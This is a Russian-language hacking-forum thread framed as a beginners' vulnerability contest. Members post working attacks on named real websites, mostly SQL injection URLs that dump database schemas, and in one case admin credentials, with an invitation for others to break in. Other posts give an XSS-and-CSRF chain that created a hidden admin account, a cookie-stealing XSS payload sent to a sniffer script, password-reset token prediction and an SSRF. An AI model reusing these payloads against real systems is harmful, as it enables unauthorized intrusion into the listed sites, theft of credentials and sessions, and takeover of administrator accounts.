Конкурс уязвимостей для новичков

Обсуждение в разделе «Песочница», начал(-а) yarbabin, 1.06.2015.

  1. t0ma5

    t0ma5 Reservists Of Antichat

    Регистрация:
    10.02.2012
    Сообщения:
    700
    Одобрения:
    570
    Репутация:
    65
    называется найди уязвимость)?
    читайте правила оформления постов

    Сайт: http://pedigree.gamedogs.cz
    Уязвимость: SQL Injection
    Code:
    http://pedigree.gamedogs.cz/managePerson.php?personId=-966+union+select+1,2,3,4,5,6,7,8,9,version%28%29,11,12+--+s
    
    10.0.23-MariaDB-0+deb8u1
     
    _________________________
    Это одобряет Take_IT.
  2. Octavian

    Octavian Member

    Регистрация:
    8.07.2015
    Сообщения:
    395
    Одобрения:
    61
    Репутация:
    14
  3. MaxxWell

    MaxxWell Banned

    Регистрация:
    5.01.2016
    Сообщения:
    36
    Одобрения:
    1
    Репутация:
    0
    Code:
    http://kupigut.ru/shop.php?id=-fashionid%27+union+all+select+1,2,3,4,5,6,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),8,9,10,11,12+--+
    Тип: SQL Injection.

    ==========================================================


    Code:
    http://hd-ural.ru/news.php?news_id=-48+union+all+select+1,2,3,4,5,6,7,8,9,10,11,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),13,14+--+
    Тип:
    SQL Ijection (вывод в title, Cntr+u)

    ==========================================================


    Code:
    http://allrose.ru/category.php?id=-1%27+union+all+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)+--+


    Тип:
    SQL Injection
     
    #123 MaxxWell, 25.08.2016
    В последний раз редактировалось: 26.08.2016
  4. NonBlizz

    NonBlizz Banned

    Регистрация:
    27.08.2016
    Сообщения:
    17
    Одобрения:
    0
    Репутация:
    0
    ТИЦ: 10 PR: 2
    Code:
    ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,concat_ws(database(),user(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
    Вывод таблиц:
    Code:
    ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,user(),3,4,5,6,7,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),9,10,11,12,13,14,15,16+--+
    Вывод админа:
    Code:
    ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,user(),3,4,5,6,7,concat_ws(0x3,username,password),9,10,11,12,13,14,15,16+from+heterodrugs.users+--+
    Version (5.5.49-cll-lve)
    Database (heterodrugs)
    User (hetero582016@localhost)


    Для простоты действий:
    ttp://heteroworld.com/cpanel/
    ttp://heteroworld.com/info.php


    P.S в Cpanel с этими данными так и не смог зайти. Кто зальётся отпишитесь=)
     
  5. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    707
    Одобрения:
    807
    Репутация:
    51
    PHP:
    http://en.runbo.net/business.php?id=-207+%55%4e%49%4f%4e%2f%2a%26%74%65%73%74%3d%31%2a%2f%53%45%4c%45%43%54%2f%2a%26%70%77%6e%3d%32%2a%2f+1,Concat(0x53716c466f72756d,0x3c62723e,SCHEMA(),0x3c62723e,user()),null,1+--+_
     
  6. PoliGroS

    PoliGroS Member

    Регистрация:
    29.03.2012
    Сообщения:
    86
    Одобрения:
    9
    Репутация:
    0
    Запрещено постить уязвимости на сайтах стран СНГ (ru, by, ua).

    Для наглядности баллы будут в ручном режиме добавляться в таблицу: https://yarbabin.ru/antichat/ - нет никакой статистики.
     
    #126 PoliGroS, 13.09.2016
    В последний раз редактировалось: 13.09.2016
  7. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    707
    Одобрения:
    807
    Репутация:
    51
    PHP:
    http://www.thinking.com.tw/page.php?tid=productinformation&action=expand&treeview_cod=1+union+select+null,2,3,%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%40%3a%3d%30%78%61%37%2c%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%66%72%6f%6d%28%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73%29%77%68%65%72%65%28%40%3a%3d%63%6f%6e%63%61%74%28%40%2c%30%78%33%63%36%63%36%39%33%65%2c%74%61%62%6c%65%5f%6e%61%6d%65%2c%30%78%33%61%2c%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%29%29%29%2c%40%29%29%29,5++--+-
     
    #127 BabaDook, 14.09.2016
    В последний раз редактировалось: 14.09.2016
  8. Octavian

    Octavian Member

    Регистрация:
    8.07.2015
    Сообщения:
    395
    Одобрения:
    61
    Репутация:
    14
    Предсказываем отправлений url при восстановлении пароля md5(time()) взламываем любои аккаунт
    Code:
    https://www.andys.md/ro/pages/login/
    http://www.andys.md/pages/restore_pass/24aedcd90a28ae58303e0a8b8906137b/
     
    Это одобряют leksadin, crlf и BabaDook.
  9. Octavian

    Octavian Member

    Регистрация:
    8.07.2015
    Сообщения:
    395
    Одобрения:
    61
    Репутация:
    14
    2 XSS и 1 CSRF беспалевный взлом, Исправили но все таки раскажу )
    При осуществление заказа поле имя уязвимо к xss которая срабатывает в панели администратора
    Code:
    http://supergut.md/ru/pages/cart/3/
    Сколько я бы не старался украсть куки они не работали незнаю почему (HttpOnly небыл выставлен к кукам и по IP тоже небыло ограничении)
    Решил попробовать CSRF атаку потому что структура админ панели мне было известно, а именно POST CSRF на добавление админа так выглядел сплоит
    Code:
    <html>
    <head>
    </head>
       <body onload='document.forms.csrf.submit();'>
         <form action="http://supergut.md/cp/newuser/" name="csrf" method="POST" target="iframe">
           <input type="hidden" name="login" value="<style>tr:last-child{display:none;}</style>">
           <input type="hidden" name="newp" value="1">
           <input type="hidden" name="newp1" value="1">
         </form>
         <iframe src="" style="display:none;" name="iframe" ></iframe>
       </body>
    </html>
    Почему в логине
    Code:
    <style>tr:last-child{display:none;}</style> 
    потому что так я мог добавлять невидимого юзера через другую инекцию в админке спрятав последнюю строку таблице
    Далее я решил использовать и ту же xss из поле имя чтоб средиректить админа на мою CSRF сделал так
    Code:
    <script>
      location="http://host/csrf.html";
    </script>
    Не прошло и 5 минут я был уже в админке
    [​IMG]
    После этого была оповещена администрация которая на 2 день профиксела
     
  10. SooLFaa

    SooLFaa Reservists Of Antichat

    Регистрация:
    17.03.2014
    Сообщения:
    447
    Одобрения:
    410
    Репутация:
    129
    Очень хорошая демонстрация, как XSS и CSRF на практике применяется.
     
    _________________________
  11. Octavian

    Octavian Member

    Регистрация:
    8.07.2015
    Сообщения:
    395
    Одобрения:
    61
    Репутация:
    14
    Раскрытие данных
    Code:
    http://www.termosuport.md/admin/
     
  12. tro0st

    tro0st New Member

    Регистрация:
    28.07.2017
    Сообщения:
    14
    Одобрения:
    4
    Репутация:
    0
    Восстановление пароля, "не помню номер телефона"(если такое выскачило, то привязана), вводишь данные страницы, ФИО и получаешь ответ на свой вопрос.
     
  13. Octavian

    Octavian Member

    Регистрация:
    8.07.2015
    Сообщения:
    395
    Одобрения:
    61
    Репутация:
    14
    Зачем
     
  14. BigBear

    BigBear Well-Known Member
    Гарант - Escrow Service

    Регистрация:
    4.12.2008
    Сообщения:
    1 645
    Одобрения:
    666
    Репутация:
    833
    _________________________
  15. Octavian

    Octavian Member

    Регистрация:
    8.07.2015
    Сообщения:
    395
    Одобрения:
    61
    Репутация:
    14
    бабадука спроси
    PS:Сиски тоже видели все но на ютубе их замазывают
     
    Это одобряют ShpillyWilly, grimnir и palec2006.
  16. f0b0s

    f0b0s Member

    Регистрация:
    26.05.2011
    Сообщения:
    5
    Одобрения:
    8
    Репутация:
    1
    Сайт:http://www.vacbanned.com
    Уязвимость: SQL Injection
    Эксплойт:
    Code:
    http://www.vacbanned.com:80/view/detail/id/76561197960265741) AND 3612=3612 AND (8789=8789
    MySQL > 5.0.11
    available databases [3]:
    [*] information_schema
    [*] vacbanned_dev
    [*] vacbanned_v2
     
  17. Octavian

    Octavian Member

    Регистрация:
    8.07.2015
    Сообщения:
    395
    Одобрения:
    61
    Репутация:
    14
    Засунул в инпутах фейка https://wf-code.ru
    Code:
    "><script>img = new Image(); img.src = "/snif.php?c="+document.cookie+window.location.href;</script><"
    Пришло
    Code:
    Cookie: PHPSESSID=a593cdb6707d2f5992dba251c386c994https://wf-code.ru/yaadmin/full.php
    [​IMG]
    [​IMG]
    Саит с доменом .ru но думаю простимо потому что фейк
     
  18. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    707
    Одобрения:
    807
    Репутация:
    51
    SSRF Подъехала
    Code:
    https://us.hidester.co
    [​IMG]
    Кто сможет перейти на другой протокол пишите метод
     
  19. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    707
    Одобрения:
    807
    Репутация:
    51
    Code:
    http://perfetto-furniture.com/podbor-mebeli.html?article=Артикул+товара&style=&category=&shape=&item_type=1&seats=&factory=&presence=0'and extractvalue(0x0a,concat(0x0a,(select user())))+--+-
     
    Это одобряют Alexandr17 и man474019.
  20. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    707
    Одобрения:
    807
    Репутация:
    51
    Таск делал
    PHP:
    http://www.drdelexchan.com/paper.php
    ?id=1')+and+false++UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,concat(0x3c7363726970743e616c6572742827,user(),0x27293c2f7363726970743e),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%60
     
    Это одобряют Veil и t0ma5.
Загрузка...